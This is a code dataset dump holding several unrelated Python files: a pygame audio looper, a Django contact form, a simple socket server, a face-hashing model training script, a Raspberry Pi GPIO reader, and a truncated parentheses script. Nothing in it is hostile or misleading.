marginTop),]\ntonearmA = Tonearm(size = 16, left = 5, top = marginTop)\ntonearmB = Tonearm(size = 16, left = 10, top = marginTop)\nclock = pygame.time.Clock()\nconsole = Console(1, 27, 32)\nsoundbank = Soundbank()\nsampler = SamplesController(soundbank)\nsamplesControlPanel = SamplesPanelWide(sampler)\nmidi = MidiController(sampler)\n\n\n\"\"\"Wides\"\"\"\nlistOfCommandsWide = ListOfCommandsWide()\nlistOfDevicesWide = ListOfDevicesWide()\ncurrentWide = None\ncurrentSide = None\n\ndef start(): \n global metronome\n global soundbank\n\n bpmChanged(metronome.bpm)\n wire.start(callback = wireCallback) \n draw.setNewFont('open-sans', 'open-sans 12')\n draw.setDefaultFont('open-sans')\n metronome.redraw()\n console.redraw()\n autoplay.setSubscribers([midi, sampler])\n\ndef update():\n ticks = pygame.time.get_ticks()\n for track in tracks:\n track.update()\n metronome.update()\n draw.update()\n\n global _suspitiousFunctionKeysLag\n _suspitiousFunctionKeysLag -= 1\n\ndef close():\n wire.stop()\n print('stop!')\n\ndef load(foldername):\n global console\n\n path = 'saves/' + foldername\n if not os.path.exists(path):\n return\n\n dict = utils.readSaveFile(path + '/app.save')\n wide = dict['current_wide']\n side = dict['current_side']\n\n soundbank.savesLoad(path, console)\n sampler.load(path, console)\n midi.load(path, console)\n\n if wide != None:\n data = wide.split(' ')\n if data[0] == 'midiPiano':\n n = data[1]\n console.emulate(interpolate('piano {n}'))\n\n if side != None:\n data = side.split(' ')\n if data[0] == 'midiPads':\n n = data[1]\n console.emulate(interpolate('pads {n}'))\n\n for track in tracks:\n track.load(path, console)\n\ndef save(foldername):\n path = 'saves/' + foldername\n if not os.path.exists(path):\n os.mkdir(path)\n os.mkdir(path + '/samples')\n for filename in os.listdir(path):\n filepath = os.path.join(path, filename)\n try:\n if os.path.isfile(filepath) or os.path.islink(filepath):\n os.unlink(filepath)\n elif os.path.isdir(filepath):\n shutil.rmtree(filepath)\n except Exception as e:\n print('Failed to delete %s. Reason: %s' % (filepath, e))\n\n global currentWide\n global currentSide\n cwide = currentWide.getSaveName() if currentWide != None else 'None'\n cside = currentSide.getSaveName() if currentSide != None else 'None'\n file = open(path + '/app.save', 'w+')\n file.write(interpolate('current_wide: {cwide}\\n'))\n file.write(interpolate('current_side: {cside}\\n'))\n file.close()\n\n soundbank.savesSave(path)\n sampler.save(path)\n midi.save(path)\n\n for track in tracks:\n track.save(path)\n\ndef tick(): \n tonearmA.update()\n tonearmB.update()\n\ndef wireCallback(indata, outdata, frames, timeinfo, status):\n global wireTempData\n global streamTimeStart\n outdata[:] = indata\n\n mask, fromSamples, fromSamplesSum = sampler.read(frames)\n\n wireTempData['audio'] = indata\n wireTempData['midi-audio'] = [[]] * 16\n for i in range(0, len(mask)):\n if mask[i]:\n wireTempData['midi-audio'][i] = fromSamples[i]\n\n if streamTimeStart == 0:\n streamTimeStart = timeinfo.inputBufferAdcTime\n elapsed = timeinfo.inputBufferAdcTime - streamTimeStart\n\n for track in tracks:\n if track.canWrite():\n #data = processor.stereoToMono(indata, 1)\n track.write(wireTempData, elapsed, frames = frames, samplerate = settings.samplerate)\n if track.canRead():\n read = track.read(elapsed, frames = frames, samplerate = settings.samplerate) \n data = processor.monoToStereo(read)\n outdata += reshapeSound(data, outdata.shape)\n \"\"\" \n TODO: smooth\n track.fade(indata, elapsed, frames = frames)\n \"\"\"\n read = metronome.readSound(frames)\n outdata += reshapeSound(read, outdata.shape)\n outdata += reshapeSound(processor.monoToStereo(fromSamplesSum), outdata.shape)\n\n tonearmA.moveBy(frames, metronome.bpm, samplerate = settings.samplerate)\n tonearmB.moveBy(frames, metronome.bpm, samplerate = settings.samplerate)\n metronome.moveBy(frames, samplerate = settings.samplerate)\n\n sync.move(frames)\n autoplay.move(frames)\n\ndef samplerateChanged(rate):\n for track in tracks:\n track.resetMemory(samplerate = settings.samplerate)\n tonearmA.resetSize(metronome.bpm, samplerate = settings.samplerate)\n tonearmB.resetSize(metronome.bpm, samplerate = settings.samplerate)\n\ndef reshapeSound(sound, shape):\n if sound.shape[0] != shape[0]:\n sound = np.resize(sound, [shape[0], shape[1]])\n return sound\n\ndef loadTapesFromFolder(path):\n for file in os.listdir('samples/' + path):\n if file.endswith(\".wav\") or file.endswith(\".mp3\"):\n names = ['track' + str(x + 1) for x in range(0, 12)]\n name = os.path.basename(file.split('.')[0])\n if name in names:\n n = int(name[5:]) - 1\n sound = processor.stereoToMono(soundbank.readDataFromFile(path +'/' + file)[0], 0)\n tracks[n].writeFiledata(sound)\n\ndef mainTabbed(event):\n looperAreas.changeArea('side')\n\ndef sideTabbed(event):\n looperAreas.changeArea('wide')\n\ndef wideTabbed(event):\n def lmbd():\n console.activate()\n if \"deactivate\" in dir(currentWide):\n currentWide.deactivate()\n looperAreas.changeArea('console', func = lmbd)\n\ndef consoleTabbed(event):\n looperAreas.changeArea('main', func = lambda: console.deactivate())\n\ndef mainReTabbed():\n looperAreas.changeArea('console')\n\ndef sideReTabbed():\n looperAreas.changeArea('main')\n\ndef wideReTabbed():\n looperAreas.changeArea('side', func = lambda: console.activate())\n\ndef consoleReTabbed():\n looperAreas.changeArea(\n 'wide',\n func = lambda: console.deactivate())\n\ndef playTrack(n, e):\n if keyboard.is_pressed('space'):\n return\n if keyboard.is_pressed('s'):\n return\n if _suspitiousFunctionKeysLag < 0:\n tracks[n].togglePlay()\n\ndef bpmChanged(bpm):\n for track in tracks:\n track.setBpm(bpm)\n track.resetMemory(samplerate = settings.samplerate)\n tonearmA.resetSize(bpm, samplerate = settings.samplerate)\n tonearmB.resetSize(bpm, samplerate = settings.samplerate)\n autoplay.updateBpm(bpm, samplerate = settings.samplerate)\n sync.onBpmChanged(bpm, samplerate = settings.samplerate)\n\ndef processConsoleCommand(event):\n console.processCommand()\n\ndef bPressed(event):\n metronome.toggle()\n\ndef setBpmPressed():\n metronome.configureBpm()\n\ndef digitPressed(event):\n # some strange arrows bug !!!\n if (event.name == 'up'\n or event.name == 'down'\n or event.name == 'left'\n or event.name == 'right'\n or event.name == 'page up'\n or event.name == 'page down'):\n return\n metronome.inputBpmDigit(int(event.name))\n\ndef arrowUpPressed(event):\n for track in tracks:\n track.decreaseSize()\n\ndef arrowDownPressed(event):\n for track in tracks:\n track.increaseSize()\n\ndef backspacePressed(event): \n metronome.backspaceBpmDigit()\n\ndef enterPressed(event):\n metronome.confirm()\n for track in tracks:\n track.confirm()\n\ndef spacePressed(event):\n metronome.confirm()\n for track in tracks:\n track.confirm()\n\ndef escPressed(event):\n metronome.cancel()\n for track in tracks:\n track.cancel()\n\ndef wideEsc(event):\n if \"escPressed\" in dir(currentWide):\n currentWide.escPressed() \n\ndef wideEnter(event):\n if \"enterPressed\" in dir(currentWide):\n currentWide.enterPressed() \n\ndef wideRight(event):\n if \"rightPressed\" in dir(currentWide):\n currentWide.rightPressed()\n\ndef wideLeft(event):\n if \"leftPressed\" in dir(currentWide):\n currentWide.leftPressed()\n\ndef wideUp(event):\n if \"upPressed\" in dir(currentWide):\n currentWide.upPressed()\n\ndef wideDown(event):\n if \"downPressed\" in dir(currentWide):\n currentWide.downPressed()\n\ndef wideDigit(event):\n # some strange arrows bug !!!\n if (event.name == 'up'\n or event.name == 'down'\n or event.name == 'left'\n or event.name == 'right'\n or event.name == 'page up'\n or event.name == 'page down'):\n return\n if \"digitPressed\" in dir(currentWide):\n currentWide.digitPressed(int(event.name))\n\ndef wideA(event):\n if \"aPressed\" in dir(currentWide):\n currentWide.aPressed()\n\ndef wideB(event):\n if \"bPressed\" in dir(currentWide):\n currentWide.bPressed()\n\ndef wideC(event):\n if \"cPressed\" in dir(currentWide):\n currentWide.cPressed()\n\ndef wideD(event):\n if \"dPressed\" in dir(currentWide):\n currentWide.dPressed()\n\ndef wideR(event):\n if \"rPressed\" in dir(currentWide):\n currentWide.rPressed()\n\ndef sideEnter(event):\n if \"enterPressed\" in dir(currentSide):\n currentSide.enterPressed() \n\ndef sideRight(event):\n if \"rightPressed\" in dir(currentSide):\n currentSide.rightPressed()\n\ndef sideLeft(event):\n if \"leftPressed\" in dir(currentSide):\n currentSide.leftPressed()\n\ndef sideUp(event):\n if \"upPressed\" in dir(currentSide):\n currentSide.upPressed()\n\ndef sideDown(event):\n if \"downPressed\" in dir(currentSide):\n currentSide.downPressed()\n\ndef sideDigit(event):\n # some strange arrows bug !!!\n if (event.name == 'up'\n or event.name == 'down'\n or event.name == 'left'\n or event.name == 'right'\n or event.name == 'page up'\n or event.name == 'page down'):\n return\n if \"digitPressed\" in dir(currentSide):\n currentSide.digitPressed(int(event.name))\n\ndef sideA(event):\n if \"aPressed\" in dir(currentSide):\n currentSide.aPressed()\n\ndef sideB(event):\n if \"bPressed\" in dir(currentSide):\n currentSide.bPressed()\n\ndef sideC(event):\n if \"cPressed\" in dir(currentSide):\n currentSide.cPressed()\n\ndef sideD(event):\n if \"dPressed\" in dir(currentSide):\n currentSide.dPressed()\n\ndef sideR(event):\n if \"rPressed\" in dir(currentSide):\n currentSide.rPressed()\n\ndef consoleKeyboardInput(key):\n console.input(key)\n\ndef prevCommand(event):\n console.input('prev')\n\ndef nextCommand(event):\n console.input('next')\n\nhotkeys.simple('b', bPressed, \"main\")\nhotkeys.simple('tab', mainTabbed, \"main\")\nhotkeys.simple('tab', sideTabbed, \"side\")\nhotkeys.simple('tab', wideTabbed, \"wide\")\nhotkeys.simple('tab', consoleTabbed, \"console\")\nhotkeys.add('s + b', setBpmPressed, \"main\")\n\nhotkeys.simple('1', digitPressed, \"main\")\nhotkeys.simple('2', digitPressed, \"main\")\nhotkeys.simple('3', digitPressed, \"main\")\nhotkeys.simple('4', digitPressed, \"main\")\nhotkeys.simple('5', digitPressed, \"main\")\nhotkeys.simple('6', digitPressed, \"main\")\nhotkeys.simple('7', digitPressed, \"main\")\nhotkeys.simple('8', digitPressed, \"main\")\nhotkeys.simple('9', digitPressed, \"main\")\nhotkeys.simple('0', digitPressed, \"main\")\nhotkeys.simple('up', arrowUpPressed, \"main\")\nhotkeys.simple('down', arrowDownPressed, \"main\")\n\nhotkeys.add('s + f1', tracks[0].toggleChangeSize, \"main\")\nhotkeys.add('s + f2', tracks[1].toggleChangeSize, \"main\")\nhotkeys.add('s + f3', tracks[2].toggleChangeSize, \"main\")\nhotkeys.add('s + f4', tracks[3].toggleChangeSize, \"main\")\nhotkeys.add('s + f5', tracks[4].toggleChangeSize, \"main\")\nhotkeys.add('s + f6', tracks[5].toggleChangeSize, \"main\")\nhotkeys.add('s + f7', tracks[6].toggleChangeSize, \"main\")\nhotkeys.add('s + f8', tracks[7].toggleChangeSize, \"main\")\nhotkeys.add('s + f9', tracks[8].toggleChangeSize, \"main\")\nhotkeys.add('s + f10', tracks[9].toggleChangeSize, \"main\")\nhotkeys.add('s + f11', tracks[10].toggleChangeSize, \"main\")\nhotkeys.add('s + f12', tracks[11].toggleChangeSize, \"main\")\n\nhotkeys.add('space + f1', tracks[0].toggleRecord, \"main\")\nhotkeys.add('space + f2', tracks[1].toggleRecord, \"main\")\nhotkeys.add('space + f3', tracks[2].toggleRecord, \"main\")\nhotkeys.add('space + f4', tracks[3].toggleRecord, \"main\")\nhotkeys.add('space + f5', tracks[4].toggleRecord, \"main\")\nhotkeys.add('space + f6', tracks[5].toggleRecord, \"main\")\nhotkeys.add('space + f7', tracks[6].toggleRecord, \"main\")\nhotkeys.add('space + f8', tracks[7].toggleRecord, \"main\")\nhotkeys.add('space + f9', tracks[8].toggleRecord, \"main\")\nhotkeys.add('space + f10', tracks[9].toggleRecord, \"main\")\nhotkeys.add('space + f11', tracks[10].toggleRecord, \"main\")\nhotkeys.add('space + f12', tracks[11].toggleRecord, \"main\")\n\nhotkeys.simple('f1', lambda e: playTrack(0, e), \"main\")\nhotkeys.simple('f2', lambda e: playTrack(1, e), \"main\")\nhotkeys.simple('f3', lambda e: playTrack(2, e), \"main\")\nhotkeys.simple('f4', lambda e: playTrack(3, e), \"main\")\nhotkeys.simple('f5', lambda e: playTrack(4, e), \"main\")\nhotkeys.simple('f6', lambda e: playTrack(5, e), \"main\")\nhotkeys.simple('f7', lambda e: playTrack(6, e), \"main\")\nhotkeys.simple('f8', lambda e: playTrack(7, e), \"main\")\nhotkeys.simple('f9', lambda e: playTrack(8, e), \"main\")\nhotkeys.simple('f10', lambda e: playTrack(9, e), \"main\")\nhotkeys.simple('f11', lambda e: playTrack(10, e), \"main\")\nhotkeys.simple('f12', lambda e: playTrack(11, e), \"main\")\n\nhotkeys.simple('backspace', backspacePressed, \"main\")\nhotkeys.simple('enter', enterPressed, \"main\")\nhotkeys.simple('space', spacePressed, \"main\")\nhotkeys.simple('esc', escPressed, \"main\")\n\nhotkeys.simple('enter', sideEnter, \"side\")\nhotkeys.simple('right', sideRight, \"side\")\nhotkeys.simple('left', sideLeft, \"side\")\nhotkeys.simple('up', sideUp, \"side\")\nhotkeys.simple('down', sideDown, \"side\")\nhotkeys.simple('1', sideDigit, \"side\")\nhotkeys.simple('2', sideDigit, \"side\")\nhotkeys.simple('3', sideDigit, \"side\")\nhotkeys.simple('4', sideDigit, \"side\")\nhotkeys.simple('5', sideDigit, \"side\")\nhotkeys.simple('6', sideDigit, \"side\")\nhotkeys.simple('7', sideDigit, \"side\")\nhotkeys.simple('8', sideDigit, \"side\")\nhotkeys.simple('9', sideDigit, \"side\")\nhotkeys.simple('0', sideDigit, \"side\")\nhotkeys.simple('a', sideA, \"side\")\nhotkeys.simple('b', sideB, \"side\")\nhotkeys.simple('c', sideC, \"side\")\nhotkeys.simple('d', sideD, \"side\")\nhotkeys.simple('r', sideR, \"side\")\n\nhotkeys.simple('esc', wideEsc, \"wide\")\nhotkeys.simple('enter', wideEnter, \"wide\")\nhotkeys.simple('right', wideRight, \"wide\")\nhotkeys.simple('up', wideUp, \"wide\")\nhotkeys.simple('down', wideDown, \"wide\")\nhotkeys.simple('left', wideLeft, \"wide\")\nhotkeys.simple('1', wideDigit, \"wide\")\nhotkeys.simple('2', wideDigit, \"wide\")\nhotkeys.simple('3', wideDigit, \"wide\")\nhotkeys.simple('4', wideDigit, \"wide\")\nhotkeys.simple('5', wideDigit, \"wide\")\nhotkeys.simple('6', wideDigit, \"wide\")\nhotkeys.simple('7', wideDigit, \"wide\")\nhotkeys.simple('8', wideDigit, \"wide\")\nhotkeys.simple('9', wideDigit, \"wide\")\nhotkeys.simple('0', wideDigit, \"wide\")\nhotkeys.simple('a', wideA, \"wide\")\nhotkeys.simple('b', wideB, \"wide\")\nhotkeys.simple('c', wideC, \"wide\")\nhotkeys.simple('d', wideD, \"wide\")\nhotkeys.simple('r', wideR, \"wide\")\n\nhotkeys.processText(consoleKeyboardInput, \"console\")\nhotkeys.simple('enter', processConsoleCommand, \"console\")\nhotkeys.simple('up', prevCommand, \"console\")\nhotkeys.simple('down', nextCommand, \"console\")\n\ndef main():\n global currentWide\n global currentSide\n global midi\n\n pygame.init()\n pygame.midi.init()\n midi.initDevices()\n draw.init(34, 30)\n logo = pygame.image.load(\"Г. Мясоедов Осеннее утро. 1893.jpg\")\n pygame.display.set_icon(logo)\n pygame.display.set_caption(\"Looper\")\n \n screen = pygame.display.set_mode((draw.cw * draw.width, draw.height * draw.ch))\n screen.set_alpha(None)\n draw.setCanvas(screen)\n \n running = True\n\n start()\n \n # main loop\n while running: \n clock.tick(60)\n midi.update()\n update()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n close()\n running = False\n elif events.check(event, 'EMULATE_CONSOLE'):\n console.emulate(event.dict['command'])\n elif events.check(event, 'BPM_CHANGED'):\n bpmChanged(event.dict['bpm'])\n elif events.check(event, 'BPM_TICK'):\n beat = event.dict['beat']\n tick()\n for track in tracks:\n track.onBeat()\n if (beat % 4) == 0:\n track.onBar()\n if (beat % 16) == 0:\n track.onGlobalLoop()\n sampler.cleanUp()\n autoplay.onBeat()\n elif events.check(event, 'BPM_HALF_TICK'):\n beat = event.dict['beat']\n for track in tracks:\n track.onHalfBeat()\n elif events.check(event, 'DEMAND_CHANGE_BPM'):\n metronome.setBpm(event.dict['value'])\n elif events.check(event, 'DEMAND_CHANGE_TRACK_SIZE'):\n tracks[event.dict['n']].setSize(event.dict['length'])\n elif events.check(event, 'DEMAND_CHANGE_SAMPLERATE'):\n settings.samplerate = event.dict['value']\n samplerateChanged(event.dict['value'])\n elif events.check(event, 'SHOW_LIST_OF_COMMANDS'):\n currentWide = listOfCommandsWide \n currentWide.redrawTitle()\n listOfCommandsWide.setCommands(event.dict['commands'])\n listOfCommandsWide.redraw()\n elif events.check(event, 'SHOW_LIST_OF_DEVICES'):\n currentWide = listOfDevicesWide\n currentWide.redrawTitle()\n listOfDevicesWide.redraw()\n elif events.check(event, 'LOAD_FOLDER'):\n if not soundbank.folderExists(event.dict['path']):\n console.print('no such folder')\n soundbank.loadFolder(event.dict['path'])\n elif events.check(event, 'LOAD_BANK'):\n if not soundbank.folderExists(event.dict['path']):\n console.print('no such folder')\n soundbank.loadBankFromFolder(event.dict['path'], event.dict['bank'])\n elif events.check(event, 'LOAD_TAPES'):\n if not soundbank.folderExists(event.dict['path']):\n console.print('no such folder')\n loadTapesFromFolder(event.dict['path'])\n elif events.check(event, 'UPDATE_SAMPLE'):\n sampler.updateSample(event.dict['name'])\n elif events.check(event, 'WIRE_MIDI'):\n midi.wireChannel(event.dict['instrument'], event.dict['device'])\n elif events.check(event, 'CREATE_INSTRUMENT'):\n type = event.dict['type']\n n = event.dict['n'] \n widecreated = False\n sidecreated = False\n\n if not midi.isChannelUsed(n):\n if type == 'piano': \n piano = MidiPiano(n, sampler)\n currentWide = piano\n widecreated = True\n elif type == 'pads':\n pads = MidiPads(n, sampler)\n currentSide = pads\n sidecreated = True\n else:\n console.print('no such type of instrument')\n \n if widecreated: \n midi.appendChannel(n, currentWide)\n currentWide.redrawTitle()\n currentWide.initDraw()\n currentWide.redraw()\n if sidecreated: \n midi.appendChannel(n, currentSide)\n currentSide.redrawTitle()\n currentSide.initDraw()\n currentSide.redraw()\n else:\n if midi.instruments[n].getType() == type:\n if type == 'piano':\n currentWide = midi.instruments[n]\n currentWide.redrawTitle()\n currentWide.initDraw()\n currentWide.redraw()\n if type == 'pads':\n currentSide = midi.instruments[n]\n currentSide.redrawTitle()\n currentSide.initDraw()\n currentSide.redraw()\n console.print('channel already exists. now displayed')\n else:\n console.print('channel is used')\n elif events.check(event, 'SAVE'):\n save(event.dict['name'])\n elif events.check(event, 'LOAD'):\n load(event.dict['name'])\n elif events.check(event, 'LOAD_INSTRUMENT'):\n if midi.instruments[event.dict['n']] == None and (not 'repeats' in event.dict or event.dict['repeats'] < 10000):\n repeats = events.dict['repeats'] if 'repeats' in event.dict else 10000\n events.emit('LOAD_INSTRUMENT', {'n': events.dict['n'], 'filename': events.dict['filename'], 'repeats': repeats})\n elif 'repeats' in event.dict and event.dict['repeats'] >= 10000:\n print('MANY REPEATS for LOAD_INSTRUMENT')\n else:\n midi.instruments[event.dict['n']].load(event.dict['filename'], console)\n elif events.check(event, 'SHOW_SAMPLER'):\n currentWide = samplesControlPanel\n currentWide.redrawTitle()\n currentWide.redraw()\n elif events.check(event, 'REDRAW_PIANO'):\n if currentWide.getType() == 'piano':\n step = event.dict['step']\n if step == 1:\n currentWide.redrawStep1()\n if step == 2:\n currentWide.redrawStep2()\n if step == 3:\n currentWide.redrawStep3()\n if step == 4:\n currentWide.redrawStep4()\n if step == 5:\n currentWide.redrawStep5()\n elif events.check(event, 'DISABLE_INSTRUMENT'):\n midi.disable(int(event.dict['n']))\n elif events.check(event, 'ENABLE_INSTRUMENT'):\n midi.enable(int(event.dict['n']))\n elif events.check(event, 'WIRE_TRACK'):\n tracks[event.dict['track']].setMidiChannel(event.dict['instrument'])\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":24635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"489798425","text":"from django import forms\nfrom django.template.defaultfilters import mark_safe\n\nclass ContactForm(forms.Form):\n subject = forms.CharField(\n max_length=100,\n label = mark_safe('Subject: ')\n )\n email = forms.EmailField(\n required=False,\n label = mark_safe('Email: ')\n )\n message = forms.CharField(\n widget=forms.Textarea,\n label = mark_safe('Message: ')\n )\n\n","sub_path":"BUCTML/contact/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"524093429","text":"import socket\r\n\r\nserversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nserversocket.bind((socket.gethostname(), 1239))\r\n\r\nserversocket.listen(5)\r\nprint ('server started and listening')\r\nwhile 1:\r\n (clientsocket, address) = serversocket.accept()\r\n print (\"connection found!\")\r\n data = clientsocket.recv(2048).decode()\r\n print(data)\r\n r='Receieve'\r\n clientsocket.send(r.encode())\r\n\r\nclientsocket.close()","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"10497776","text":"from utils import *\nfrom model import DFHNet\nimport torch.optim as optim\nfrom datetime import datetime\nimport sys\nimport argparse\nfrom Loss import DualClasswiseLoss\nfrom torch.utils.data import DataLoader\nimport time\nimport torch.backends.cudnn as cudnn\nfrom torchvision import datasets\nfrom InceptionRes_ft_pytorch.inception_resnet_v1 import InceptionResnetV1\n\n\n\nparser = argparse.ArgumentParser(description='PyTorch Implementation of Paper: Deep Center-based Dual-constrained Hashing(DCDH).')\nparser.add_argument('--lr1', default=0.005, type=float, help='learning rate of backbone network')\nparser.add_argument('--lr2', default=0.005, type=float, help='learning rate of loss layer')\n\nparser.add_argument('--save', type=str, help='path to saving model')\nparser.add_argument('--dataset', type=str, default='facescrub', help='should be one of {facescrub, youtube, vgg}')\nparser.add_argument('--bs', type=int, default=256, help='Batch size of each iteration')\nparser.add_argument('--len', type=int, default=48, help='length of hashing codes, should be one of {12, 24, 36, 48}')\n\n# hyper params.\nparser.add_argument('--sigma', default=0.25, type=float, help='class gap of ClasswiseLoss')\nparser.add_argument('--inner_param', default=0.1, type=float, help='balance weight on two constraints')\nparser.add_argument('--lamda', default=1, type=float, help='regularization on regression')\nparser.add_argument('--eta', default=0.01, type=float, help='quantization weight')\n\nargs = parser.parse_args()\n\ndevice = \"cuda:0\" if torch.cuda.is_available() else \"cpu\"\ncudnn.benchmark = True\n\n\nif args.dataset in ['facescrub', 'youtube']:\n\n EPOCHS = 700\n transform_tensor = transforms.Compose([\n transforms.ToTensor()])\n trainset = MyDataset(args.dataset, transform=transform_tensor, train=True)\n trainloader = DataLoader(trainset, batch_size=args.bs, shuffle=True)\n testset = MyDataset(args.dataset, transform=transform_tensor, train=False)\n testloader = DataLoader(testset, batch_size=args.bs, shuffle=False)\n net = torch.nn.DataParallel(DFHNet(args.len)).to(device)\n classes = len(np.unique(trainset.train_y))\n\nelse:\n EPOCHS = 100\n trainPaths = \"./vggface2/train\"\n testPaths = \"./vggface2/test\"\n cropped_size = 160\n Normalize = transforms.Normalize((0.5141, 0.4074, 0.3588), (1, 1, 1))\n\n transform_train = transforms.Compose([\n transforms.Resize(cropped_size),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n Normalize,\n ])\n\n transform_validation = transforms.Compose([\n transforms.Resize(cropped_size),\n transforms.ToTensor(),\n Normalize,\n ])\n\n trainset = datasets.ImageFolder(root=trainPaths, transform=transform_train)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=args.bs, shuffle=True, num_workers=6)\n testset = datasets.ImageFolder(root=testPaths, transform=transform_validation)\n testloader = torch.utils.data.DataLoader(testset, batch_size=args.bs, shuffle=False, num_workers=6)\n classes = len(trainset.classes)\n Inception = InceptionResnetV1(pretrained=\"vggface2\", fc=True, num_bits=args.len)\n net = torch.nn.DataParallel(Inception).to(device)\n\n\ndef adjust_learning_rate(optimizer, epoch):\n\n \"\"\"Sets the learning rate to the initial LR decayed by 0.5 every 100 epochs\"\"\"\n lr = []\n lr.append(args.lr1 * (0.5 ** (epoch // 100)))\n lr.append(args.lr2 * (0.5 ** (epoch // 100)))\n for i, param_group in enumerate(optimizer.param_groups):\n param_group['lr'] = lr[i]\n return lr\n\n\ndef train(EPOCHS):\n\n print('==> Preparing training data..')\n\n if args.dataset in ['facescrub', 'youtube']:\n\n print(\"number of training images: \", len(trainset.train_y))\n print(\"number of classes: \", classes)\n print(\"number of test images: \", len(testset.test_y))\n print(\"number of training iterations per epoch:\", len(trainloader))\n\n else:\n print(\"number of training images: \", len(trainset))\n print(\"number of classes: \", classes)\n print(\"number of test images: \", len(testset))\n print(\"number of training iterations per epoch:\", len(trainloader))\n\n criterion = DualClasswiseLoss(num_classes=classes, inner_param=args.inner_param, sigma=args.sigma, feat_dim=args.len, use_gpu=True)\n\n best_epoch = 0\n best_loss = 1e4\n if args.dataset in ['facescrub', 'youtube']:\n optimizer = optim.Adam([\n {'params': net.module.parameters(), 'weight_decay': 1e-4, 'lr': args.lr1, 'amsgrad': True},\n {'params': criterion.parameters(), 'weight_decay': 1e-4, 'lr': args.lr2}\n ])\n else:\n optimizer = optim.SGD([\n {'params': net.module.parameters(), 'weight_decay': 5e-4},\n {'params': criterion.parameters(), 'weight_decay': 5e-4}\n ], lr=args.lr, momentum=0.9)\n\n since = time.time()\n for epoch in range(EPOCHS):\n print('==> Epoch: %d' % (epoch + 1))\n net.train()\n dcdh_loss = AverageMeter()\n adjust_learning_rate(optimizer, epoch)\n # epoch_start = time.time()\n for batch_id, (imgs, labels) in enumerate(trainloader):\n imgs, labels = imgs.to(device), labels.to(device)\n optimizer.zero_grad()\n hash_bits = net(imgs)\n loss_dual = criterion(hash_bits, labels)################ difference between imageloader and custom loader\n hash_binary = torch.sign(hash_bits)\n batchY = EncodingOnehot(labels, classes).cuda()\n W = torch.mm(torch.inverse(torch.mm(torch.transpose(batchY, 0, 1), batchY) + args.lamda * torch.eye(batchY.size(1)).cuda()),\n torch.mm(torch.transpose(batchY, 0, 1), hash_binary)) # Update W\n\n batchB = torch.sign(torch.mm(batchY, W) + args.eta * hash_bits) # Update B\n\n loss_vertex = (hash_bits - batchB).pow(2).sum() / len(imgs)\n loss_h = loss_dual + args.eta * loss_vertex\n\n dcdh_loss.update(loss_h.item(), len(imgs))\n loss_h.backward()\n optimizer.step()\n\n print(\"[epoch: %d]\\t[hashing loss: %.3f ]\" % (epoch+1, dcdh_loss.avg))\n\n if (epoch+1) % 10 == 0:\n net.eval()\n with torch.no_grad():\n centers_trained = torch.sign(criterion.centers.data).cuda()\n trainB, train_labels = compute_result(trainloader, net, device, centers_trained)\n testB, test_labels = compute_result(testloader, net, device, centers_trained)\n mAP = compute_mAP(trainB, testB, train_labels, test_labels, device)\n print('[Evaluate Phase] Epoch: %d\\t mAP: %.2f%%' % (epoch+1, 100. * float(mAP)))\n\n if dcdh_loss.avg < best_loss:\n print('Saving..')\n if not os.path.isdir('checkpoint'):\n os.mkdir('checkpoint')\n torch.save({'backbone': net.module.state_dict(),\n 'centers': criterion.state_dict()}, './checkpoint/%s' % args.save)\n best_loss = dcdh_loss.avg\n best_epoch = epoch\n\n if (epoch - best_epoch) > EPOCHS // 4:\n print(\"Training terminated at epoch %d\" %(epoch + 1))\n break\n\n time_elapsed = time.time() - since\n print(\"Training Completed in {:.0f}min {:.0f}s with best loss in epoch {}\".format(time_elapsed // 60, time_elapsed % 60, best_epoch + 1))\n print(\"Model saved as %s\" % args.save)\n\n\n\nif __name__ == '__main__':\n\n if not os.path.isdir('log'):\n os.mkdir('log')\n save_dir = './log'\n\n assert args.save\n sys.stdout = Logger(os.path.join(save_dir,\n str(args.len) + 'bits' + '_' + args.dataset + '_' + datetime.now().strftime('%m%d%H%M') + '.txt'))\n print(\"[Configuration] Training on dataset: %s\\n Len_bits: %d\\n Batch_size: %d\\n learning rate: %.3f\\n #Epoch: %d\\n\"\n %(args.dataset, args.len, args.bs, args.lr1, EPOCHS))\n print(\"HyperParams:\\nsigma: %.3f\\t inner_param: %.4f\\t eta: %.4f\\t lamda: %.4f\" % (args.sigma, args.inner_param, args.eta, args.lamda))\n train(EPOCHS)\n","sub_path":"dcdh_train.py","file_name":"dcdh_train.py","file_ext":"py","file_size_in_byte":8028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"306580231","text":"import RPi.GPIO as GPIO\r\nimport time\r\nfrom GCStatic import eb21\r\n\r\ndef get_signal(mode, i):\r\n res = ''\r\n if(mode == 'board'):\r\n GPIO.setmode(GPIO.BOARD)\r\n p = eb21.board[i]\r\n elif(mode == 'bcm'):\r\n GPIO.setmode(GPIO.BCM)\r\n p = eb21.bcm[i]\r\n print(i, p)\r\n GPIO.setup(p, GPIO.IN)\r\n res = GPIO.input(p)\r\n while(res == GPIO.input(p)):\r\n time.sleep(0.1)\r\n res = GPIO.input(p)\r\n return res\r\n\r\nif __name__ == '__main__':\r\n GPIO.cleanup()\r\n i = 7\r\n GPIO.setmode(GPIO.BOARD)\r\n print('board', i)\r\n while True:\r\n print(get_signal('board', i))\r\n# print('bcm')\r\n# blink('bcm')\r\n GPIO.cleanup()\r\n print('end')\r\n","sub_path":"vs1838b.py","file_name":"vs1838b.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"490104654","text":"import os\nimport time\nimport all_brackets2\nfrom parentheses import *\n\n\n# def remove_bad():\n# for br in brackets:\n# if br.count('()') <= 4:\n# newbrackets.append(br)\n\nst = list('123456789')\nbr = 